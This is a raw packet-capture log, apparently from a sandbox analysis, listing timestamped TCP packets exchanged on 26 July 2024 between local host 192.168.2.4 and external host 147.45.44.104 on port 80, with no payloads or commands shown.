Jul 26, 2024 18:56:40.373794079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.373815060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.373827934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375437975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375451088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375461102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375473022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375483990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375493050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375495911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375519037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375526905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375534058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375560999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375574112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375605106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375734091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375746965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375756979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375768900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375768900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375782013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375788927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375794888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375807047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.375816107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375833988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.375858068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.376338959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376389980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.376512051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376523018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376533031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376554966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.376580000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376580000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.376595020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376607895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376615047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.376621008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.376631021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.376646996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.377424002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377434969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377444983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377455950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377471924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.377487898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.377563000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377574921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377585888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377597094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.377598047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.377623081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.377649069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.378516912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378529072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378540039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378551960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378561020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378566027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.378573895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378592968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.378609896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.378669977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378680944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.378704071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.378717899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.379467964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379479885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379491091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379503012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379511118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.379513979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379527092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.379527092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379542112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379553080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.379553080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.379573107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.379587889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.380299091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380311966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380321980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380335093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380343914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380347013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.380358934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380371094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380378008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.380394936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.380417109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.380428076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.380464077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.381252050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381264925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381277084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381289959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381299019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.381299973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381314039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381323099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.381325960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381340981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.381369114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.381385088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.381421089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.388792992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.388850927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.388902903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.388931990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.388942957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.388961077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.388967037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.388992071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.388998032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389022112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389028072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389058113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389066935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389096975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389103889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389127016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389132023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389159918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389161110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389173031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389189005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389205933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389713049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389729977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389744997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389754057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389760971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389770031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389786005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389799118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389863968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389875889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389887094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389898062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.389899015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389913082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.389933109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.410917044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.410938978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.410950899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.410963058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.410974979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.410984993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.411014080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.411068916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.411082029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.411092997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.411103964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.411129951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.412039995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412084103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.412235022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412247896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412259102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412271976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412280083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.412283897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412296057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412303925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.412307978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.412322044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.412348986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.464896917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.464946032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.464960098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.464972973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.464993954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465008974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465122938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465133905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465143919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465153933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465161085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465174913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465202093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465545893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465557098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465567112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465576887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465585947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465588093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465600014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465606928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465611935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.465631008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.465645075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.466237068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466245890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466254950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466264963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466274977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466279030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.466286898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466293097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.466299057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466310978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466319084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.466320992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466331959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.466336012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.466356993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.466381073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.467180014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467190027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467200041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467209101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467217922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467222929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.467230082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467240095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467242956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.467256069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467266083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467268944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.467277050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.467283964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.467298985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.467320919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.468159914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468170881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468179941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468189955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468199015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.468199968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468211889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468216896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.468223095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468238115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468241930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.468249083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468259096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.468261003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.468282938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.468305111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.469120979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469132900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469141006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469151020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469161034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.469176054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.469192982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469203949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469213963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469213963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.469223976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469233990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469238043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.469244957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.469261885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.469275951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.470077038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470089912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470098019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470108986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470118999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470124006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.470129967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470140934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470150948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470150948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.470164061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470165014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.470175982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.470187902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.470211983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.470994949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471007109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471015930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471028090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471035004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.471039057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471050978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471050024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.471062899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471074104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.471074104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471086979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471097946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471097946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.471112013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.471134901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.471963882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471976042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471986055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.471996069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472003937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.472007990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472019911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472026110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.472031116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472042084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472048044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.472054005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472064972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472069979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.472093105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.472913980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472925901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472935915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472946882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472951889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.472959995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472970963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472982883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472995043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.472996950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473006964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473018885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473021030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473035097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473057985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473875999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473889112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473898888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473908901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473915100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473922014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473932981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473943949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473944902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473957062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473967075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.473968983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473980904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.473982096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.474001884 CEST	49757	80	192.168.2.4	147.45.44.104
